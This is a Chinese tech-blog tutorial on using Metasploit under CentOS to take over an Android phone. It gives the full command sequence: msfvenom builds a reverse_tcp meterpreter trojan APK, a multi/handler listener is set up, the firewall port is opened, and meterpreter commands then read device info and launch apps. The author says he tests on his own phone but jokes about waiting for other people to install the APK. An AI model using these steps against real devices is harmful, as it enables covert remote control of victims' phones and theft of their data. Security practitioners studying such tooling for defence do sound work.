网络大杂烩首页

网络大杂烩

  • 网站首页
  • HTML/CSS
  • javascript
  • seo优化
  • PS美工
  • 系统安全
  • 漏洞预警
  • 编程学习
  • 原创专区
  • 【网络大杂烩】是一家综合技术门户,为您提供网站建设,编程开发,安全维护,漏洞预警等技术文章

    技术文章MAP

    文章

    Centos Linux下使用Metasploit之渗透Android手机测试

    日期:2019/12/7 17:50:23来源分类:系统安全

    Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。

    这篇文档只适合在Centos Linux已经安装了Metasploit的大伙。
    博客去浏览并安装,然后再回来~(如果此博客的安装已经过期了,官方找或者网上找)

    看完Metasploit简介后,其下有一个工具msfvenom可以生成木马,打开linux终端,最好登录root,怕出错,然后输入命令

    $ msfvenom
    Enter下看看都啥?一大堆指令让你烦~

    先查看一下所有类型的攻击负荷(看成木马也行),输入命令

    $ msfvenom --list payloads
    Enter下来,数据很多,我们从里面找Android类型的就行,我是来操控手机的,不会干其它的

    复制一下黄色框的字段,tcp格式的,接下来会用到

    android/meterpreter/reverse_tcp

    知道了“木马”的名称,还得知道终端的ip,输入ifconfig查看内网ip(俺的是本地测试的)

    $ ifconfig

    ip拿到了,还不赶紧的开始生成木木马-_-,msfvenom兄弟,靠你了,输入

    $ msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.122.129 LPORT=3333 R > first.apk
    -p, --payload 使用攻击负荷。指定一个’-'或者输入(stdin)用户自定义的payloads(攻击负荷)。
    LHOST ip地址
    LPORT 自定义端口(注意,那些所谓的防火墙全踏马都要关闭,记得端口要放行且没被占用,不然渗透没软用)

    生成的木马最好能放在一个可以访问的文件夹上,我直接first.apk,在终端目前路径上可以看到有文件生成。如果没有,那就是失败了,检查一下你的端口是否占用!生成成功的编译大概会出现Payload size: 10181 bytes字段

    木马生成完毕,msfvenom兄弟的工作就基本完工了,接下来就有请msfconsole上场了,没错,就是打开metasploit的控制台,着手配置相关信息,开始渗透了~

    直接输入msfconsole

    $ msfconsole
    长久看多了单调代码的你,下面的图形代码有没有让你灰色的世界多点点色彩~~

    谈正事~我们需要配置什么呢?前面生成木马的时候不是设置了ip和端口吗?现在我们也要在控制台上配置ip和端口,做监听来的

    要做的流程大概是这些(在msfconsole模式下)加载exploit模块

    msf > use exploit/multi/handler
    (exploit模式下)选择之前我们粘贴过一次的攻击载荷:android/meterpreter/reverse_tcp

    msf exploit(multi/handler)> set payload android/meterpreter/reverse_tcp
    (exploit模式下)查看一下列表有没有多出你设置的载荷

    msf exploit(multi/handler)> show options
    (exploit模式下)设置黄色框下的LHOST和LPORT,就设置成之前生成木马搞的ip和端口

    顺便放行端口,输入命令firewall-cmd --add-port=3333/tcp

    firewall-cmd --add-port=3333/tcp # 开放通过tcp访问3333

    配置的流程都搞完了,马上就是渗透了。
    群灵觉醒,封印解除,出来吧!exploit
    输入命令exploit,开始监控,记住不要关掉,就坐等别人的手机安装,然后别人点击的瞬间,俺这里马上获取到别人手机的控制权,到时候,嘿嘿。当然,俺这里是渗透自己的手机(然并软—~)

    安装好木马后,点击打开的瞬间,没有啥反应。手机上没反应没关系,关键是终端exploit监听有反应,并且开始渗透并成功。
    如果终端没有反应,就是防火墙的问题,设置的端口要放行

    输个?,查看命令列表

    比如查看下手机信息

    sysinfo
    想打开某个应用,输入app_list查看app列表

    然后使用使用app_run命令打开app对应的package名称

    手机上的termux就会自己启动
     

    随机推荐

    • 该分类还没有添加任何内容!
    • 该分类还没有添加任何内容!

    Copyright 2005-2019 【网络大杂烩】 版权所有 黑ICP备16886888号

    声明:本站所有文章来自互联网 如有异议 请联系本站管理员